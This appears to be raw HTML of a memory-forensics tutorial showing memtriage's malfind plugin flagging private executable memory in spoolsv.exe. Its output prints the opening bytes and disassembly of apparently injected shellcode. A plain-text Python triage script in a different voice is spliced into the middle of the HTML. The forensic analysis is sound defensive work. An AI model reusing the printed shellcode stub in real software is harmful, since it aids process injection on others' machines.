text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; 
font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">The data in this CSV output file can again be easily converted to PowerShell objects and reviewed using something like this:</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font size="2">$malfind = Get-Content .\malfind.csv | ConvertFrom-Csv</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; 
font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font size="2">PS> $malfind</font></span></p><p class="p2" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px; min-height: 14px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Process<span class="Apple-converted-space"> </span>: spoolsv.exe</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Pid<span class="Apple-converted-space"> </span>: 1120</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Address<span class="Apple-converted-space"> </span>: 14417920</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: 
no-common-ligatures;">VadTag <span class="Apple-converted-space"> </span>: VadS</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Protection : PAGE_EXECUTE_READWRITE</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Flags<span class="Apple-converted-space"> </span>: PrivateMemory: 1</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Data <span class="Apple-converted-space"> </span>: Protection: 6</span></p><p class="p2" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px; min-height: 14px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"></span><br /></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Process<span class="Apple-converted-space"> </span>: spoolsv.exe</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 
0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Pid<span class="Apple-converted-space"> </span>: 1120</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Address<span class="Apple-converted-space"> </span>: 1033265020928</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">VadTag <span class="Apple-converted-space"> </span>: VadS</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Protection : PAGE_EXECUTE_READWRITE</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Flags<span class="Apple-converted-space"> </span>: PrivateMemory: 1</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; 
font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Data <span class="Apple-converted-space"> </span>: Protection: 6</span></p><p class="p2" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px; min-height: 14px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"></span><br /></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Process<span class="Apple-converted-space"> </span>: spoolsv.exe</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Pid<span class="Apple-converted-space"> </span>: 1120</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Address<span class="Apple-converted-space"> </span>: 1033271443456</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">VadTag <span 
class="Apple-converted-space"> </span>: VadS</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Protection : PAGE_EXECUTE_READWRITE</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Flags<span class="Apple-converted-space"> </span>: PrivateMemory: 1</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Data <span class="Apple-converted-space"> </span>: Protection: 6</span></p><p class="p2" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px; min-height: 14px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"></span><br /></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Process<span class="Apple-converted-space"> </span>: spoolsv.exe</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: 
monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Pid<span class="Apple-converted-space"> </span>: 1120</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Address<span class="Apple-converted-space"> </span>: 1033272295424</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">VadTag <span class="Apple-converted-space"> </span>: VadS</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Protection : PAGE_EXECUTE_READWRITE</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Flags<span class="Apple-converted-space"> </span>: PrivateMemory: 1</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; 
line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Data <span class="Apple-converted-space"> </span>: Protection: 6</span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">Above is </font><font face="courier">malfind's</font><font face="inherit"> output. Called this way, </font><font face="courier">malfind</font><font face="inherit"> shows four suspect memory regions in </font><font face="courier">spoolsv.exe's</font><font face="inherit"> process memory. I don't know the exact heuristic </font><font face="courier">malfind</font><font face="inherit"> uses, but it may be a combination of the </font><font face="courier">Protection</font><font face="inherit"> and </font><font face="courier">Flags</font><font face="inherit"> values. The </font><font face="courier">PrivateMemory</font><font face="inherit"> flag means the memory region is not backed by a file on disk, whereas a dll loaded into a process would normally be backed by the dll file on disk. 
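To make that heuristic concrete, here is an added example (my code, not the post's and not memtriage's) that reads malfind CSV rows like the ones above and ranks each region: private memory that is both executable and writable is the classic injection footprint, and private memory that is executable but no longer writable gets a lower-confidence tier, since page permissions can be tightened after the code is written. It assumes the CSV columns carry the same names as the object properties shown above; the first four rows are the regions reported above and the last three are constructed to exercise the other branches. The decimal Address column is rendered as hex so it lines up with the addresses malfind prints in its full, non-CSV output.

```python
"""Triage malfind CSV output: rank private (unbacked) memory regions by their
page protection.  Added example, not the post's code.  Assumption: the CSV
header matches the property names shown in the PowerShell output above."""
import csv
import io

# Constructed CSV: the four spoolsv.exe regions reported above, then three
# made-up rows (executable-but-not-writable private memory, plain private
# read/write memory such as a heap, and an image-backed region).
SAMPLE_MALFIND_CSV = """\
Process,Pid,Address,VadTag,Protection,Flags,Data
spoolsv.exe,1120,14417920,VadS,PAGE_EXECUTE_READWRITE,PrivateMemory: 1,Protection: 6
spoolsv.exe,1120,1033265020928,VadS,PAGE_EXECUTE_READWRITE,PrivateMemory: 1,Protection: 6
spoolsv.exe,1120,1033271443456,VadS,PAGE_EXECUTE_READWRITE,PrivateMemory: 1,Protection: 6
spoolsv.exe,1120,1033272295424,VadS,PAGE_EXECUTE_READWRITE,PrivateMemory: 1,Protection: 6
spoolsv.exe,1120,1033273344000,VadS,PAGE_EXECUTE_READ,PrivateMemory: 1,Protection: 3
spoolsv.exe,1120,1033274392576,VadS,PAGE_READWRITE,PrivateMemory: 1,Protection: 4
spoolsv.exe,1120,140700000000000,Vad,PAGE_EXECUTE_WRITECOPY,PrivateMemory: 0,Protection: 7
"""


def parse_flags(raw):
    """'PrivateMemory: 1' (or several such pairs joined by commas) -> {name: int}."""
    flags = {}
    for pair in raw.split(","):
        if ":" in pair:
            name, value = pair.split(":", 1)
            flags[name.strip()] = int(value.strip())
    return flags


def classify(row):
    """Rank one region.

    'rwx-private': private memory that is executable and writable, the
                   footprint of code written straight into the process;
    'x-private':   private memory that is executable but no longer writable,
                   worth a look because permissions can be changed after
                   injection;
    None:          nothing stands out (not executable, or file-backed).
    """
    private = parse_flags(row["Flags"]).get("PrivateMemory") == 1
    prot = row["Protection"]
    executable = "EXECUTE" in prot
    writable = "READWRITE" in prot or "WRITECOPY" in prot
    if private and executable and writable:
        return "rwx-private"
    if private and executable:
        return "x-private"
    return None


def triage(csv_text):
    """Return [(pid, hex_address, tier)] for every region worth a look,
    in the order malfind reported them."""
    hits = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        tier = classify(row)
        if tier:
            hits.append((int(row["Pid"]), hex(int(row["Address"])), tier))
    return hits


if __name__ == "__main__":
    for pid, address, tier in triage(SAMPLE_MALFIND_CSV):
        print(f"pid {pid}  {address:>16}  {tier}")
```

On the constructed input the four regions from the post come out as rwx-private (the first at 0xdc0000), the PAGE_EXECUTE_READ row lands in the x-private tier, and the heap-like and image-backed rows are not reported. Private executable memory is where to spend analyst time first; whether a given region is actually code still needs the raw bytes and disassembly that malfind's full output provides.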
The PAGE_EXECUTE_READWRITE protection is an artifact of the code being written into the memory region. These permissions can be changed after injection; in fact, <a href="https://twitter.com/christruncer" target="_blank">Chris Truncer's</a> <a href="https://github.com/Veil-Framework/Veil" target="_blank">Veil Framework</a> <a href="https://www.veil-framework.com/" target="_blank">explicitly calls this out</a> and addresses it. Testing </font><font face="courier">malfind</font><font face="inherit"> against that would be a fun future project, and maybe it's been done already.</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;">The <font face="courier">malfind</font> plugin can do more. If run without CSV output, you'll get something like this:</span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span 
style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">.\memtriage.exe --pid 1120 --dumpdir .\malfind_dump --plugins malfind</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><br /></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>********************Plugin: malfind********************</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Process: spoolsv.exe, Pid: 1120</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 
0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">VadTag: VadS, Protection: PAGE_EXECUTE_READWRITE, Flags: PrivateMemory: 1, Protection: 6</span></p><p class="p2" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px; min-height: 14px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"></span><br /></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Raw data at address 0xdc0000: fc4889ce4881ec002000004883e4f0e8cc000000415141505251564831d265488b5260488b5218488b5220488b7250480fb74a4a4d31c94831c0ac3c617c022c</span></p><p class="p2" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px; min-height: 14px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"></span><br /></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Disassembly:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; 
font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0xdc0000 fc <span class="Apple-converted-space"> </span>CLD</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0xdc0001 4889ce <span class="Apple-converted-space"> </span>MOV RSI, RCX</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0xdc0004 4881ec00200000 <span class="Apple-converted-space"> </span>SUB RSP, 0x2000</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0xdc000b 4883e4f0 <span class="Apple-converted-space"> </span>AND RSP, -0x10</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0xdc000f e8cc000000 <span class="Apple-converted-space"> </span>CALL 0xdc00e0</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; 
margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0xdc0014 4151 <span class="Apple-converted-space"> </span>PUSH R9</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0xdc0016 4150 <span class="Apple-converted-space"> </span>PUSH R8</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0xdc0018 52 <span class="Apple-converted-space"> </span>PUSH RDX</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0xdc0019 51 <span class="Apple-converted-space"> </span>PUSH RCX</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0xdc001a 56 <span class="Apple-converted-space"> </span>PUSH RSI</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0xdc001b 4831d2 
<span class="Apple-converted-space"> </span>XOR RDX, RDX</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0xdc001e 65488b5260 <span class="Apple-converted-space"> </span>MOV RDX, [GS:RDX+0x60]</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0xdc0023 488b5218 <span class="Apple-converted-space"> </span>MOV RDX, [RDX+0x18]</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0xdc0027 488b5220 <span class="Apple-converted-space"> </span>MOV RDX, [RDX+0x20]</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0xdc002b 488b7250 <span class="Apple-converted-space"> </span>MOV RSI, [RDX+0x50]</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0xdc002f 480fb74a4a <span 
class="Apple-converted-space"> </span>MOVZX RCX, WORD [RDX+0x4a]</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0xdc0034 4d31c9 <span class="Apple-converted-space"> </span>XOR R9, R9</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0xdc0037 4831c0 <span class="Apple-converted-space"> </span>XOR RAX, RAX</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0xdc003a ac <span class="Apple-converted-space"> </span>LODSB</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0xdc003b 3c61 <span class="Apple-converted-space"> </span>CMP AL, 0x61</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0xdc003d 7c02 <span class="Apple-converted-space"> </span>JL 0xdc0041</span></p><p 
